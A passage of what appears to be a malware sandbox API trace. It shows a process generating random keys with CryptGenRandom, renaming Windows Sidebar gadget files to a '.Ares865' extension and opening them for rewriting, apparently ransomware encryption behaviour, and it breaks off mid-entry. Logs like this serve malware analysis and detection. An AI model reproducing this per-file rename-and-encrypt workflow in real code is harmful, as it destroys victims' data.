[0117.058] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.058] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.061] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.062] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.062] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.062] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)redStateIcon.png.Ares865") returned 108 [0117.062] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)redStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)redstateicon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)redStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)redstateicon.png.ares865"), dwFlags=0x1) returned 1 [0117.064] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)redStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)redstateicon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.064] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=680) returned 1 [0117.064] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.065] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.065] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.067] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.068] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.068] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.068] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US" [0117.069] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html.Ares865") returned 89 [0117.069] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\settings.html"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\settings.html.ares865"), dwFlags=0x1) returned 1 [0117.070] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\settings.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.070] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8382) returned 1 [0117.070] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.071] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.071] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.075] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.075] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.075] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.076] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html.Ares865") returned 88 [0117.076] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\weather.html"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\weather.html.ares865"), dwFlags=0x1) returned 1 [0117.077] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\weather.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.077] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16190) returned 1 [0117.077] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.078] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.078] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.081] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.082] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.082] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.083] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js" [0117.083] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js.Ares865") returned 98 [0117.083] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\highdpiimageswap.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\highdpiimageswap.js.ares865"), dwFlags=0x1) returned 1 [0117.085] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\highDpiImageSwap.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\highdpiimageswap.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.085] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1820) returned 1 [0117.086] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.086] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.086] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.089] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.090] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.090] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.090] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\library.js.Ares865") returned 89 [0117.090] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\library.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\library.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\library.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\library.js.ares865"), dwFlags=0x1) returned 1 [0117.092] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\library.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\library.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.093] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43776) returned 1 [0117.093] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.094] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.094] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.098] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.099] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.099] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.100] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\localizedStrings.js.Ares865") returned 98 [0117.100] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\localizedStrings.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\localizedstrings.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\localizedStrings.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\localizedstrings.js.ares865"), dwFlags=0x1) returned 1 [0117.101] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\localizedStrings.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\localizedstrings.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.101] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14476) returned 1 [0117.101] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.102] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.102] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.105] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.105] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.105] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.106] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\settings.js.Ares865") returned 90 [0117.106] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\settings.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\settings.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\settings.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\settings.js.ares865"), dwFlags=0x1) returned 1 [0117.108] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\settings.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\settings.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.108] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=57960) returned 1 [0117.108] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.109] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.109] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.113] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.114] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.114] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.115] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\weather.js.Ares865") returned 89 [0117.115] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\weather.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\weather.js"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\weather.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\weather.js.ares865"), dwFlags=0x1) returned 1 [0117.118] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\weather.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\weather.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.118] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=135370) returned 1 [0117.119] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.119] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.119] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.128] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.129] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.129] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.131] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css" [0117.131] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css.Ares865") returned 101 [0117.131] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\localizedsettings.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\localizedsettings.css.ares865"), dwFlags=0x1) returned 1 [0117.133] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\localizedsettings.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.133] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=974) returned 1 [0117.134] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.134] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.134] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.137] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.137] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.137] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.138] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\settings.css.Ares865") returned 92 [0117.138] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\settings.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\settings.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\settings.css.ares865"), dwFlags=0x1) returned 1 [0117.139] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\settings.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\settings.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.139] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10118) returned 1 [0117.139] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.140] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.140] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.143] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.143] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.143] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.144] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\weather.css.Ares865") returned 91 [0117.144] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\weather.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\weather.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\weather.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\weather.css.ares865"), dwFlags=0x1) returned 1 [0117.145] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\weather.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\weather.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.145] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24636) returned 1 [0117.146] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.146] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.146] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.149] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.150] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.150] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.151] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget" [0117.151] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png.Ares865") returned 80 [0117.151] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\drag.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\drag.png.ares865"), dwFlags=0x1) returned 1 [0117.153] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\drag.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.153] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=30069) returned 1 [0117.154] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.154] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.154] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.157] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.158] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.158] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.159] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png.Ares865") returned 80 [0117.159] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\icon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\icon.png.ares865"), dwFlags=0x1) returned 1 [0117.160] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows 